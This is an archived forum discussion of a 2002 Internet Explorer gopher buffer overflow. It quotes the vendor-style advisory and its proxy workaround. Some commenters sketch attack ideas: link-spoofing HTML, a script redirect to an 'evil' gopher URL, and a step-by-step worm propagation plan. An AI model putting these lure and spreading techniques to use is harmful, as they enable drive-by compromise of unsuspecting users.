Latest IE Hole Lets Gopher Root You

rvaniwaa writes "Another hole in internet explorer has been discovered. This hole allows a hacker to root a user's computer whenever the user clicks on a gopher link. All versions of IE are affected and a Microsoft spokesman stated that the company is "moving forward on the investigation with all due speed""

My thoughts:

[FortKnox]

Written in one of my journal entries [slashdot.org].

See if this story follows pattern (I think it will).

Re:My thoughts:

[EnderWiggnz]

thats not the point -

if you make a link to a gopher site in an html page, the average MS surfer will not hesitate to click on it.

which is what the web was supposed to do, make it transparent.

Re:My thoughts:

[EnderWiggnz]

first of all, its an URL buffer overflow, a gopher link isnt needed.

al thats needed is for someone to disguise an "evil" link, and whammo - you've got r00t.

big big big remote exploit.

Re:My thoughts:

[sphealey]

The existence of the exploit in the first place is troubling, but the *really serious* problem is #3, where almost nobody installs the patch until it is too late. Basically, Microsoft may not care as much about security as the security experts do, but the sad truth is that many users and even sysadmins care even less.

Well, yes. OTOH, you missed Step 3a, where the Microsoft patch breaks numerous mission-critical non-Microsoft applications. Office 97 SP2 was a classic here: Novell Netware clients never worked the same after that one was installed. Necessary for security I am sure. And NT SP6, which broke Lotus Notes.

You also missed step 2.9, where the hapless sysadmin spends 3 days trying to figure out Microsoft's patch dependency tree, which is not published. And even M$ admits that they use different, and incompatible, patch mechanisms for different product lines. So if I pull out the install disk to add an additional function to Visio, do I have to reinstall Office XP patches? Why or why not?

sPh

Too damn obvious

[CaseyB]

Let the "gopher hole" jokes begin.

Re:Too damn obvious

[Bob McCown]

OK...

Here's one [carlspackler.com]

Kinda funny actually

[einhverfr]

Hmmm... Two headlines I saw immediately on going to /. today:

One about a company releasing a report indicating that Open Source software is inherently insecure.

Another about a new security hole in IE (Thank god I use Konqueror ;))

Now we need the good PR people at Microsoft to release the source code to Internet Explorer and IIS so that they can prove their first point...

Whack-a-Mole (not quite a gopher joke, but...

[dpilot]

certainly more applicable to the concept of fixing security holes in Microsoft software.

FYI: Whack-a-Mole is an old arcade game where you hold a padded mallet facing a slightly inclined surface with a half-dozen or so holes. Periodically a little mole pops up from a hole, and you try to whack him before he goes back down on his own. A little bit like playing XBill, only in the Real World.

Re:Too damn obvious

[kesuki]

If this proves anything, It proves that you can't trust gophers. It's just like caddyshack all over again... those mangy critters, rooting IE.

Re:Too damn obvious

[Jucius Maximus]

Is it wednesday already? Time sure flies.

I didn't expect the next roothole announcement to appear so soon.

Re:Too damn obvious

[Jucius Maximus]

Just one question:

Why the h3ll is anyone motivated to find bugs in IE's gopher protocols?!? It must have been a real slow day at Oy Online Solutions [solutions.fi] for them to find this.

Re:Too damn obvious

[btellier]

You're looking at security research backwards. When I do security audits, particularly closed-source ones, I look at the more "obscure" features first. The benefits to this are numerous:

- The program's maintainers are less likely to check these portions of code for errors because users don't complain about them as much.

- The legacy protocols probably contain code from the pre-security awareness days. They're more likely to contain such "new" security concerns as Format String bugs and signed/unsigned conversions.

- Other people doing audits on the same software have probably been over all the basics many times using automated tools and buffer overflow spamming.

I know the above post was probably meant as a joke, but the guys above are probably more clever than you think.

Re:Too damn obvious

[ncc74656]

Thinking about groundhogs?

You've never watched Caddyshack [imdb.com], have you?

All three gopher links left..

[sphealey]

Speaking as a person who used to use gopher quite a bit - how many gopher links are left on the WWW? Three?

sPh

Re:All three gopher links left..

[linderdm]

I agree that there may not be many gopher links that look like gopher links, but what stops the malicious from disquising their gopher links to look like regular hrefs?

Re:All three gopher links left..

[kesuki]

nothing... a simple redirect page can force the gopher link to be opened without the user even being asked to click anything. Not to mention javascript. Anything that allows all those pop-up and pop-under ads can just as easily open a gopher link.

Re:All three gopher links left..

[br0ck]

Exactly.. it wouldn't take long for a page that says <gopher://ut2003demo>Download the UT 2003 demo</a> to nuke a bunch of computers. (Where's the demo anyway, dammit, I'm dying to play!)

As I pointed out yesterday [slashdot.org], there's more info [solutions.fi] about the bug and it's prevention available from Oy Solutions, who found the exploit.

Re:All three gopher links left..

[snake_dad]

(Where's the demo anyway, dammit, I'm dying to play!)

You mean you haven't found it yet? It's right here! [ut2003.com]

Re:All three gopher links left..

[silicon_synapse]

Why does a user need to click on the link? Why not just use a javascript location.href= or whatever to automatically load the link? It's my understanding that Yahoo Profiles still lets you embed javascript in a picture URL. What's to stop someone from creating an automated attack and then getting chatters to check your profile? The possibilites seem endless.

Re:All three gopher links left..

[gosand]

I agree that there may not be many gopher links that look like gopher links, but what stops the malicious from disquising their gopher links to look like regular hrefs?

Or better yet, auto-forwarding to them. Throw up a hit page for Google to find, and sit back and wait for the hits. Or spam with the address. It isn't like someone who would exploit this is scrupulous or anything.

Re:All three gopher links left..

[Jucius Maximus]

"I agree that there may not be many gopher links that look like gopher links, but what stops the malicious from disquising their gopher links to look like regular hrefs?"

<a href="gopher://hostile-link" on mouseover status.text="http://www.friendlysite.com" return true>click here!</a>

Now my javascript is rusty and I have not tried this ... but you get the idea.

Re:All three gopher links left..

[Jason Earl]

Of course if all you need to do to take over an IE users computer is run a gopher server and get some hapless schmoe to click on a gopher link you can bet there will be a sudden resurgence in this venerable protocol. I imagine mixing in a link in pornography spam would probably net you quite a few computers. Some of them would almost certainly have useful information.

Re:All three gopher links left..

[shadow303]

Funny you should mention a resurgence. I just found this manifesto of people wanting to revive gopher.
http://www.scn.org/~bkarger/gopher-manife sto

Re:All three gopher links left..

[zangdesign]

What would be the advantages of reviving gopher? I can't think of any.

Re:All three gopher links left..

[Lord Omlette]

1. This is all the evidence Jon Katz needs to prove that Gopher is making a comeback and it's hackers like us who are doing it and we will overthrow the digerati and the ??AA and it could only be possible in a post 9/11 world.

2. Since gopher's used very rarely, if at all anymore, that's probably why MS hadn't bothered to keep the code up to date. /Gs isn't all it's cracked up to be :(

Re:All three gopher links left..

[Simon Brooke]

Speaking as a person who used to use gopher quite a bit - how many gopher links are left on the WWW? Three?

That really isn't the point. It would not take many minutes to put up a gopher server with a Win 32 rootkit as content, and then put an innocent but interesting looking link into a web page ('free live world cup scores' would do nicely just now) with an href pointing to that server, and, ideally, one of those annoying JavaScript scrollers in the browser status display to prevent the user from noticing they're about to click a gopher link, and, hey! That's a few more suckers rooted. It will probably go through most firewalls, too.

If you (or your organisation) still use Internet Explorer, I would treat this as serious. Change your default IE install to have gopher point to a safe machine of your own; block gopher at your firewall; and, ideally, switch to Opera 6, Netscape 6, or Mozilla as your organisation's default browser.

This isn't going to be the last security hole found in IE.

Re:All three gopher links left..

[Zocalo]

There are over a million Gopher links according to Google [google.com]. Which, I have to admit, is a few orders of magnitude more than what I was expecting.

Hmm. Now I'm going all nostalgic for Archie, Veronica and WAIS. Well, maybe not WAIS.

Re:All three gopher links left..

[SgtChaireBourne]

Youll notice in the article that you dont actually have to have a gopher server running. MSIE just has to connect to the trap [solutions.fi] via a gopher-like URL.

Re:All three gopher links left..

[BlowCat]

This reminds me a joke [breathemail.net] about a sword incompatible with non-certified dragons :-)

Just because nobody uses something legitimately, it doesn't mean that nobody will use it maliciously.

hostile Gopher site?

[Fantanicity]

"hostile Gopher site"? Ouch ... I think shall wear kevlar underpants while using IE in future.

Re:hostile Gopher site?

[bryan1945]

Yes, come to my evil, eeeeeevil
gopher site [snowmonsters.com]

And how's that working for ya?

[jimmu]

From the article:

In January, Microsoft Chairman Bill Gates instructed employees to make software security a top priority.

Yeah, looks like everythings moving full steam ahead on that front.

Re:And how's that working for ya?

[liquidsin]

Hey, cut them some slack. It only took five months to find a hole in a protocol that nobody's used in...what...seven, eight years? We should have all the IE/Outlook bugs patched up sometime around 2026.

...and yet

[rknop]

And yet, despite regular reports like this, posters on Slashdot keep asking why anybody who "cares about the web" would bother using a browser other than IE, and suggest that somebody who wants to use another browser (and, heavens, support cross-platfrom and cross-platfrom browsers) is a naive moralistic high-horse-rider who needs to wake up and get with the program.

With the program doesn't look like a very nice place to get to me....

-Rob

Re:...and yet

[Fantanicity]

When are the writers of other browsers going to release the documentation proving that the gopher handling code has been security auditted, that sufficient gopher testcases have been built, and that the browser passed all the gopher handling tests?

The reason there are aren't reports of security holes in gopher code in other browers is that no-one has looked, not that the holes don't exist.

**Sigh...**

[TweeKinDaBahx]

Most of the other browsers have security holes found in them from time to time as well, but most of the kind crackers out there seems to take a diabolical pleasure in focusing on IE (and since it's one of the core technologies of it, Windows...). If people spent as much time trying to break many of the other Browsers out there, I'm sure they would find they're all their own brand of swiss cheese.

No software is rock solid, even when it's written to be. There's always a european teenager with way too much time on their hands just waiting to turn you Titanium fortress into a window screen...

Re:**Sigh...**

[Jeremi]

No software is rock solid, even when it's written to be

Perhaps so, but avoiding buffer overflows isn't rocket science. It's a simple matter of bounds checking. There's really no excuse.

New MS Hacker Slogan

[Anonymous Coward]

"Where do you want to gopher today?"

ObCaddyshack:

[kafka93]

"I smell varmint poontang, and the only good varmint poontang is dead varmint poontang, I think."

well you can't expect...

[arson1]

Well you can't expect Microsoft to keep up with all these new technologies and formats!

Wow...

[TweeKinDaBahx]

...I can only imagine how someone found this one.

However dangerous this hole may be, there are a few reasons why it probably won't create an end of the world scenario, most imporatant of these that gopher is absolutly archaic. I personally havn't seen a gopher server since 1996 (at MIT).

Second, as always, Microsoft will have a patch out fairly quickly, which is more that can be said for mozilla half of the time...

*Ducks and covers due to flying penguins*

Re:

[account_deleted]

Comment removed based on user account deletion

Re:Wow...

[Gerv]

most imporatant of these that gopher is absolutly archaic.

<script>
document.location.replace("gopher://ev il.gopherser ver.com:7000/buffer_overflow/");
</script>

Second, as always, Microsoft will have a patch out fairly quickly, which is more that can be said for mozilla half of the time...

I'm amazed at how you split one security hole (XMLHTTPRequest) in two to make a "half the time"... :-)

Incidentally, the patch for XMLHTTPRequest was in nightly builds within 48 hours of the bug report, and in the next milestone within about a week. In contrast, there are currently 17 unpatched holes in IE [jscript.dk]. What was that you were saying about "quickly"?

Gerv

The remedy

[sh0rtie]

To protect from potential exploiting, you can temporarily disable the gopher
protocol like this:

Go to Tools -> Internet options -> Connections. Click on "LAN settings".
Check "Use a proxy server for your LAN". Click on "Advanced...".

Go to the Gopher text field
and enter "localhost", and "1" in the port field. This will stop Internet
Explorer from showing and processing any gopher pages.

this will protect you for now, at least until M$ pull their finger out

Or...

[Robber Baron]

Don't use IE!

Re:Or...

[Jucius Maximus]

"Don't use IE!"

I wish it was that simple. There are hordes of people out there who have jobs where if they install anything on their work computer they will get in trouble.

I am one of these people. I have no choice but to use MSIE and Outlook on NT at work.

I feel so dirty.

And thus the previous comments [slashdot.org] about blocking gopher are important to many.

Re:Or...

[SethJohnson]

I think it is then your responsibility to intentionally fall victim to every IE / Outlook exploit that comes around. Make your suffering public within the company. Demonstrate how your productivity is reduced due to the draconian browser and mail client policies of your company. After repeated episodes of the IT crew re-imaging your machine, perhaps they'll reconsider.

What's worse?

[NanoGator]

What's worse? Saying "Don't use IE!" as a blatant attempt at karma whoring, or that some idiot moderators modded that up.

Logic check: "Don't use the browser that most websites are designed for!"

Do you really think I'd be using IE right now if Opera was cutting it?

Re:What's worse?

[stinky wizzleteats]

Ah, the ubiquitous inevitibility argument.

That argument is, of course, bullshit. Use of a modern HTML DTD such as 4.01 strict enforces consistent behavior on the client side. Javascript may still be a problem, but handicapped accessiblity guidelines will require that content be delivered without its use.

There was a time where I could not browse the web with anything but IE because of the MS incited erosion of HTML standards. But the resurgence of attention to those standards, combined with a significant and growing user population using non IE browsers, have forced most web sites to un-adapt from the defacto Microsoft standard.

As for Opera specifically, it is the only browser out there which consistently obeys pre- HTML 4.01 strict DTDs. I am a paying user of Opera, and use it on all my GUI systems.

Re:Not necessarily...

[zzyzx]

Where are you getting that? The related article [yahoo.com] says, 'According to Oy Online, a hacker could take over a user's computer simply by having the user click on a link to a "hostile Gopher site." That one click would install and run any program the hacker chose on the victim's computer, and the victim might never know'

According to the oy online page [solutions.fi] "The part of code in IE which parses gopher replies contains an exploitable buffer overflow bug... . The server can be very minimal, ie. a program that can listen on a TCP port and write a block of data; a fully operational gopher server isn't necessary in order to carry out the attack. "

It looks like an accurate link to a gopher server is needed for this attack.

It looks like there needs to be a hostile site existing, unless you have another link.

Re:Not necessarily...

[zzyzx]

"It looks like an accurate link to a gopher server is needed for this attack.

It looks like there needs to be a hostile site existing, unless you have another link."

It also looks like I should actually read what I write when I preview instead of just checking to make sure that the links work.

Whoops...

[Andy Dodd]

I just found a site with more details. Turns out that a hostile server has to be set up.

So it is a valid remedy.

The site's URL (It's all over this story, but for good measure...) - http://www.solutions.fi/index.cgi/news_2002_06_04? lang=fi

Yay I'M SAFE!

[ramdac]

I don't have a root user...this must mean my M$ machine is perfectly safe!?

Re:Yay I'M SAFE!

[Kizzle]

Thats what sucks about windows, you can't say that you rooted some one. Saying "I AMINISTRATORED YOU!" just doesnt sound cool.

Re:Yay I'M SAFE!

[zulux]

The best thing about Windows?

It forced me to learn to spell 'administrator.'

Kinda like how FTP forced me to learn to spell 'anonymous.'

Or somthing.

Stats, anyone?

[DesScorp]

Has anyone ever tried to compile stats on security holes in browsers? What I'd like to see is a comparison of browsers in this case, with each version listed with the various vulnerabilities found? Obviously, IE is going to come out on top here, but I'd be interested to see such a list anyway. I've looked around the SANS site and didn't see anything like that. I'd even settle for a short summary. Something like IE has X amount of holes, Netscape has Y amount of holes, Opera has Z amount, and so on.

Re:Stats, anyone?

[sh0rtie]

Yep this site specialises in just that
Here [jscript.dk]

also George Guninski does some research here
Here [guninski.com]

and Mr Malware
Here [malware.com]

Re:Stats, anyone?

[InfiniteVoid]

There is no way these type of statistics are going to be accurate.

First, there's the question of what constitutes a security hole. some might say allowing rampant JavaScript popups is a security hole. Others might require that binary code actually be executed on the machine, or that the HD is modified.

Second, the number of security holes found, in the case of closed-source browsers, is the number of security holes that its company wants to bother telling you about. It's entirely possible that there are hundreds of security holes in IE that MS knows about and hasn't divulged. Maybe they were quietly fixed in previous IE patches. Maybe they're left unfixed so MS can look like it's making speedy repairs when someone finally finds the bug on their own and tells the press. Again, there's no way of knowing how many of the bugs are being reported.

Finally, the number of security holes found may correlate strongly with how insecure a browser is. But it could also be that said browser is just used more. Or its code is readable, so such bugs can be found. Or it is actively being developed by coders who care about security. Or no one uses the browser and it's insecure as hell but nobody cares.

Too many variables. Any study on the number of security holes known is only going to tell you one thing: the number of security holes *known*.

Gopher, gopher....

[mrgrey]

I think I read about that in one of my CS books....I recall the prof telling us not needing to retain the information.

Great!

[Ibjr]

A Gopher has rooted a hole in you! Wow, slashdot stories are funny again!

Online Solutions' page

[Radnor]

Here [solutions.fi] is the page from Online Solutions which details the bug, as well as a workaround and a gopher link to test IE's vulnerability.

Mosaic Bug?

[cybermage]

The article says this affects all versions of IE. I wonder if this hole dates all the way back to NCSA Mosaic. It'd be pretty funny if the hole is that old.

If this is, in fact, a NCSA Mosaic bug, it probably exists in Netscape thru version 4.x as well. I'd be pretty surprised if either company felt the need to alter the gopher code while they were busy fighting over http.

Re:Mosaic Bug?

[Master Bait]

The bug has more to do with the idea of having your browser automatically execute binaries retrieved over the net than it does with gopher. I doubt if Netscape ever had the hole.

Reminicent of the CHARGEN port problem

[iceT]

Anyone remember the CHARGEN problem with IE3? Connect to the CharGen port, and IE would read and cache (in memory) until the PC crashed?

It's fun when MS figures out something new for the Internet...

Message from Osama to Mr..Gates

[AftanGustur]

I love your stuff [theregister.co.uk]

Sadlly...

[C0vardeAn0nim0]

segfault.org is temporarily out of busines or it'll be a good time for an "arcticle" in the lines of "no IE security flaws found this week".

now seriously, this is getting anoying. since I started to rely on mozilla only (or since I ditched netscape 4.x for good) some 6 months ago I saw only ONE serious security flaw reported on it and it was corected in a week or so. but with IE we have at least 2 anoucements a month. this is getting so frequent I'm here asking /. to only publish news about IE when the head line is someting in the lines of the segfault.org's style headline above. It'd save a lot in terms of my patience and bandwidht.

Slipping off the treadmill

[babbage]

The last gopher server I used to visit regularly shut down something like three years ago. As far as I know -- no, I haven't checked -- there are no active gopher servers anymore.

And Microsoft is just getting around to hunting down security holes *now*? What does this say about more current protocols?

I predict that by 2005, they'll start looking for holes in SOAP )

CaddyShack

[tswinzig]

Sandy: "I want you to kill all the gophers on this course."

Spackler: "Check me if I'm wrong Sandy, but if I kill all the golfers, they'll lock me up and throw away the key."

Sandy: "The GOPHERS, man! Kill all the GOPHERS!"

New Product: Microsoft Door

[Ghengis]

Keep the burglars out of your house with the new Microsoft Door. Complete with not dead-bolts, but tape, yes TAPE to keep it locked. Also, we've reached an all new level of user friendliness with the omission of door-knobs!!!

When was the last time...

[istartedi]

...anybody clicked on a gopher link?

If there isn't a patch yet, or if MSFT says you gotta have IE6 or something, easiest thing to do is just block gopher. What is the gopher port anyway?

Re:When was the last time...

[Permission Denied]

gopher is 70/tcp according to assigned numbers, but all the gopher links I still see around (I know of three or four - not joking) run on non-standard ports.

One fun thing is that our directory services only have a gopher interface and don't have an http interface. This means I publish my email address, postal address and telephone number using gopher. This is great because the spambots don't do crawl gopher, so I get zero spam, but most people using a web browser can still view my contact information.

Official Bugtraq Post

[PunchMonkey]

The Official Bugtraq Post:

OVERVIEW
========

Gopher is a protocol developed at the University of Minnesota in the
early 1990's. Gopher servers offer hierarchically organized directories
and files. These form a "gopherspace" which can be thought of as the
predecessor of the World Wide Web. Gopher was mostly abandoned soon after
HTTP and the World Wide Web started gaining popularity.

Microsoft Internet Explorer has a built-in gopher client. Gopher pages can
be accessed via URLs starting with "gopher://". The part of code in IE
which parses gopher replies contains an exploitable buffer overflow
bug. A malicious server may be used to run arbitrary code on an IE user's
system.

DETAILS
=======

When the overflow is triggered, a fixed sized buffer in stack gets
overwritten with data from the gopher server. This data can contain most
octets from 0 to 255 (also nulls) which makes it particularly easy to
inject a working shellcode in it. This is a traditional, trivially
exploitable buffer overflow. A test exploit has been successfully used to
run arbitrary code without user intervention with various IE versions and
systems including IE 5.5 and 6.0.

The attack can be launched via a web page or an HTML mail message which
redirect the user to a malicious gopher server when the victim views them.
The server can be very minimal, ie. a program that can listen on a TCP
port and write a block of data; a fully operational gopher server isn't
necessary in order to carry out the attack.

The exploiter could do anything that a regular user could do on the
system: retrieve, install, or remove files, upload and run programs, etc.

Full technical details aren't disclosed at this time to prevent
exploitation.

WORKAROUND
==========

Internet Explorer users can protect themselves from the flaw by disabling
the gopher protocol. Barely any gopher servers exist on the Internet
today, so this is unlikely to cause problems. If needed, a gopher client
or some other web browser can be used to access the gopherspace.

An easy way to disable processing and displaying gopher pages is to define
a non-functional gopher proxy in Internet Options. Select Tools ->
Internet options -> Connections. Click on "LAN settings". Check "Use a
proxy server for your LAN". Click on "Advanced...". Here you can define
proxy servers to be used with different protocols. Go to the Gopher text
field and enter "localhost", and "1" in the port text field. This will
stop Internet Explorer from fetching any gopher documents.

After installing the patch from Microsoft you can remove these gopher
proxy settings (or restore them to values they had before).

For more information and a vulnerability test see
http://www.solutions.fi

VENDOR STATUS
=============

Microsoft was contacted on May 20th. At the moment of writing this
advisory, Microsoft has started designing and coding a fix, but hasn't
given any approximation of when it would be released. The patch will be
available at

http://www.microsoft.com/technet/security/current. asp

when it is completed.

Workaround

[DeadSea]

Is there a workaround for this? Probably not. I don't think any of the major browsers have a way to selecivly disable browser features. It would be nice if you could disable gopher: hyperlinks until this got fixed.

A nice browser feature would be a regular expression based prefilter of web pages. If a file called prefilter.rules exists, the browser would run the raw html of each pages it downloaded through the filter. This would allow admins to make the browser safe again (with some lost functionality) until the browser was patched.

In this case you might want to use a rule something like:
s/(gofer\:[^'" \n\r\t]*)/about:blocked.html?$1/

I should see if this is a requested feature for mozilla yet. With browsers knowing about regexp for javascript this probably wouldn't be too hard to implement. Plus once it was implemented, you could use it for blocking ads and other annoyances.

All IE Versions?

[toupsie]

What about the MacOS 9 and MacOS X version of Internet Explorer? Generally when the press says there is an IE security issue, it doesn't effect us but I could not gleam that info from the short! Yahoo! article!

Microsoft is so good at screwing up its own OS, thank God they seem to do a good job with Mac apps (though 90% of our security problems are due to M$).This will be moot for Mac Users anyway with Chimera [mozdev.org] looking better every day (nightly build).

Gopher Info Links

[digital_freedom]

For those of you who don't know what gopher is or where it's being used, here is a little info and some links to projects and sites related to this good old protocol.

About gopher:
Gopher is an infoserver which can deliver text, graphics, audio, and
multimedia to clients. Keeping documents "link clean", making linking a
function of the server info-tree and not in the doc, layout is kept to
its most frugal minimum, and is standard across all docs. No graphic
design means its the ideal navigable interface, a hypertext Eden. It
gives simplified usage for sight-impaired users, same contents for
wired/wiredless, and requires no capital investments in layout and
"design". Gopher is real -- and it was fully functional in 1992, even
without advertisements!
Taken from the gopher manifesto [scn.org]

Google's Gopher stuff [google.com]
Yahoo's Gopher stuff [yahoo.com]

For those that want to go gopher hunting. Here's a link [umn.edu] to a gopher server at the University of MN. I don't think they will install BackOrifice or something, but user beware!

I wonder how secure a gopher server is?

Active gopher sites.

[AJWM]

The last time I actually used a gopher site was about a year ago, some wire service was running it for its news stories.

However, a quicky search turns up several still-active gophers, for example:
gopher://gopher.umsl.edu/ [umsl.edu]
gopher://gopher.cac.psu.edu/ [psu.edu]
(These actually return data -- some others I found the server up but no data returned).

As to why gopher died out, Tim Berners-Lee offers the following:

"It was just about this time, spring 1993, that the University of Minnesota decided that it would ask for a license fee from certain classes of users who wanted to use gopher. Since the gopher software being picked up so widely, the university was going to charge an annual fee. The browser, and the act of browsing, would be free, and the server software would remain free to nonprofit and educational institutions. But any other users, notably companies, would have to pay to use gopher server software.

"This was an act of treason in the academic community and the Internet community. Even if the university never charged anyone a dime, the fact that the school had announced it was reserving the right to charge people for the use of the gopher protocols meant it had crossed the line. To use the technology was too risky. Industry dropped gopher like a hot potato."

(from his book, Weaving the Web)

Re:Active gopher sites.

[Zeinfeld]

"To use the technology was too risky. Industry dropped gopher like a hot potato."

Tim is certainly right that this was a factor, however the MN policy change came after HTTP had passed gopher in terms of usage (as measured on the NSF backbone).

The Web was winning largely because Gopher had a very puritanical outlook. They wanted to hold the net back in the era of VT100 terminals, fixed width fonts and the only formatting being normal, bold and inverse font.

Another problem was that they really had their heads up their asses when it came to URLs. Their idea of muiltimedia content was that a file could be a text file or a picture. The idea of pictures in the text was anathema.

Now there have been claims made by the Netscape FUD dept. that there was also opposition to images in the Web community. Actually nothing could be further from the truth. There were a lot of complaints about the botched design of the IMG tag. To be fair to Marc he did give the world 8 hours to comment on his proposal, two of which were actually business hours in Europe (none of which were business hours in the US however).

By the time the university tried to cash in gopher was already on a downturn. The university action was simply the coup de grace. If it had come when gopher was more popular someone would have forked the source tree or developed an open version.

Today a lot of the 'gopher' servers are actually Web servers that have the ability to serve multiple protocols.

9 out of 10 Terrorists agree! Microsoft's secure!

[JohnDenver]

Obligitory reference to story posted earlier today...
'Think Tank' Issues Microsoft-Funded Troll [slashdot.org]

According to this ZDNet article, a Washington think tank known as the Alexis de Tocqueville Institution is soon to release a study stating that Open Source Software allows terrorists an easy time hacking into our systems. It's little suprise that this group takes money from Microsoft." The Register's story is good too. All the whoring reports in the world won't make open source any less secure.

Everybody knows terrorists love to target Mozilla users by sending them links which causes there system to email Star Office attachments to everybody with payloads that will delete all your OGGs and PNGs by exploiting security holes in Sendmail.

Technical details straight from the source

[DeadMeat (TM)]

here [solutions.fi].

Well, sort of, anyway. They don't go into much detail because of fear of people exploiting it, but it's some kind of buffer overflow (big surprise there) triggered by a malicious Gopher server.

BugTraq

[kylus]

Here is another article [securityfocus.com] from SecurityFocus about the issue, along with the original post [securityfocus.com] to the BugTraq mailing list about this problem.

Since When

[quantaman]

A Microsoft spokesman who refused to be identified said Tuesday that the company is "moving forward on the investigation with all due speed" and will take the action that best serves its customers.

Since when did M$ start offering downloads of Mozilla?

This was in the works for some time

[BoxJockey]

As you can imagine, "the gopher hole" was a project microshaft envisioned early-on. They couldn't let this go public until they had something to catch the little beasts with. Fortunately now they can catch the gophers with microshaft's giant .net.

You see...

[Rogerborg]

... this is why I'm still using Lynx [browser.org]. I'll maybe give one of these new fangled "GUI port 80 telnet clients" a whiz once they're robust enough to deal with ten year old technology.

mosiac money

[OpenMind(tm)]

The possibility of this being a Mosaic hole reminds me of one of life's fun little ironies:

Marc Andreessen wrote Mosaic while at the University of Illinois. After he went on to found Netscape, Microsoft came to an agreement with the University of Illinois to license the Mosaic source code to use it as the core of the Internet Explorer browser. The fact that they still license it is referenced in IE's "About Box". Now the UofI's intellectual property policy is that the creators of the property get ~40% of the licensing money. So, the odds are pretty good that Marc gets annual checks of Microsoft money to pay for his old source code, which was used to destroy his beloved company. Makes me feel bad for him.

Still, it is kind of funny that Microsoft ends up paying some miniscule part of my University salary because they've never been able to write a web browser from scratch.

This is an outlook exploit waiting to happen

[ILikeRed]

How long till this is put in a javascript / html email exploit???

Why do we need anything but text in email? I could even live with a subset of html that would display graphics, but full html???

scary....

New MS Slogan!

[Hiro Antagonist]

Microsoft: Now with more exploited holes than a two-dollar hooker.

What the hell is this about?

[drew_kime]

A Microsoft spokesman

who refused to be identified said Tuesday ...

And just why should we trust anything this guy says? Their official spokesman won't even stand by what he's saying. And what is he saying, anyway?

Refusing to confirm the security flaw, the Microsoft spokesman said the company "feel(s) strongly that speculating on the issue while the investigation is in progress would be irresponsible and counterproductive to our goal of protecting our customers' information."

And the spokesman added, "Responsible security researchers work with the vendor of a suspected vulnerability issue to ensure that countermeasures are developed before the issue is made public and customers are needlessly put at risk."

So again, as far as Microsoft is concerned, it's the fault of the people who publicized it. It's prudent to assume these guys are not the only ones who know about the problem. Which means my information is already at risk.

So if there are people out there who can compromise my system, why shouldn't I be able to find out about it and take preventive measures? Why should I have to wait until Microsoft -- who haven't even admitted to the vulnerability yet, two weeks after being told about it -- get around to fixing it?

Re:What the hell is this about?

[Freija Crescent]

And just why should we trust anything this guy says? Their official spokesman won't even stand by what he's saying. And what is he saying, anyway?

His identity is being protected through obscurity. If he open-sourced his name, his job/email account/etc would be open to attack.

So again, as far as Microsoft is concerned, it's the fault of the people who publicized it. It's prudent to assume these guys are not the only ones who know about the problem. Which means my information is already at risk.

Your information has been at risk ever since installing your operating system. You agreed to the EULA upon installing it, and that paper holds you responsible for data sharing, you agreed to not hold Microsoft responsible for data loss, intrusion, etc. Also what concerns me is that you claim that other people know about the problem. That is unlikely, as the EULA also forbids reverse-engineering the code to find exploits.

Additionally, you have the DMCA to protect you, which means that if anyone tries to circumvent the data safeguards on your system, they will be prosecuted.

I think you are being overly paranoid.

-fc

Get Your Easy Fix Right Here!!!!

[kryzx]

It is really easy to fix this problem with this script I wrote. Just click on the link below to get it.

gopher://gopher.URr00t3d.ru [theonion.com]

Buffer overflow, buffer overflow, buffer overflow

[dpbsmith]

...why do they have to find and fix them one by one? Can't they switch to a programming language, or debugging tool, or run-time library, that would find and fix all of them?

Indeed, about the time Windows 2000 was released with 65536 known bugs (or whatever the exact number was), didn't Jim Allchin say that they had such a tool and were using it?

Should buffer overflows be as outdated as Gopher itself?

Re:Buffer overflow, buffer overflow, buffer overfl

[digidave]

The problem is that with only 32-bit addressing it's impossible to programatically store all of the bugs in Microsoft's software.

Even tho gopher is dead, this is a problem

[joshv]

Everyone keeps saying "but there are like three gopher servers left out there". This is not the point. Any buffer overflow in the IE client code which is exploitable is a huge problem. It doesn't matter that there are damned few servers left that use the exploitable protocol. A malacious server need not even be a fully functioning gopher server, it just needs to listen for requests on the right port and respond appropriately. A worm'ed IIS server could fit the bill quite nicely.

A smart worm could:
1. Infect an IIS server via some unfixed hole, or backdoor left by another worm.
2. Open up a dummy gopher port which responds to all requests with the exploit.
3. Replace links on the web site the IIS server serves with links to the gopher server exploit.
4. The worm installs itself on all client machines that click the gopher links and begins scanning for vunerable servers.
5. Goto 1.

None of this has anything to do with the number gopher servers left on the Internet.

-josh

Special Offers

[CMiYC]

I found it humorous that in the "Special Offers" Box there was a ad/link that read: "Access Your PC from Anywhere - Free Download"

For all of you slamming MS

[kraf]

They don't care.

Yeah, they made some PR stunts concerning security, but until stuff like this starts affecting their bottom line, they won't care.
There are just too many morons out there buying their stuff, so the situation won't change anytime soon.

And don't give me that crap about being forced into using it. Noone is going to hold a gun against your head and say: use explorer or die.
If your employer makes you use stuff you hate, then you're just a lame pushover and you deserve what you get.

Microsoft Has Already Released A Patch!!

[Entropy_ah]

Click here [mozilla.org] to download it.

This *could* be intentional...

[surprise_audit]

Anyone consider the possibility that it may be policy at Micro$oft to allow such holes in the software?

Considering that the browser components are supposedly scattered through many DLLs, any patches from M$ could easily include updates for Digital Rights Management lockdown, spyware to tell tales, etc, as well as the 'next big hole' that someone will 'discover' whenever MS feels the need to send out more tracking/spying/crippling patches.

Heck, they don't even need to include such stuff, just track who downloads the latest patch and correlate with previous data to build a picture of what's out there.

For example, say ten million distinct folks download the latest patch for Win98. If M$ *know* they've only sold eight million copies of Win98, they know there are 2 million BSA targets out there...

Duh...

[Andy Dodd]

Because legit gopher sites that already aren't the problem.

It's bogus trap Gopher sites (Or likely merely URLs) that are.

I'm guessing that the attack doesn't even involve contacting a Gopher server, it is likely to be a buffer overflow attack in the URL. (I'm guessing that it's a relative of previous URL BO attacks that both NS and MSIE were vulnerable to.)

It's just as newsworthy as bogus HTTP URLs rooting your system were. Because these gopher links look just like HTTP links unless you look at your browser's URL display. Most of us, including myself, don't bother looking unless we have reason to be suspicious. (Like any link in a /. post)

Not a URL buffer overflow, but nearly as dangerous

[Andy Dodd]

It's a buffer overflow originated by a hostile Gopher server.

Just as dangerous, unless you block all Gopher sites using your firewall preferences. As I said before - It's not the legit links (Of which almost none still exist) that are the problem, it's the hostile servers whose links are displayed identically to HTTP links.

Same as any other URL...

[Andy Dodd]

Except it's gopher:// instead of ftp:// or http://

That's why this problem is so dangerous, and not "irrelevant and non-newsworthy" as some others claim.

Re:And we all know

[CaseyB]

Use Archie!

Archie was for FTP. The Gopher equivalent was Veronica.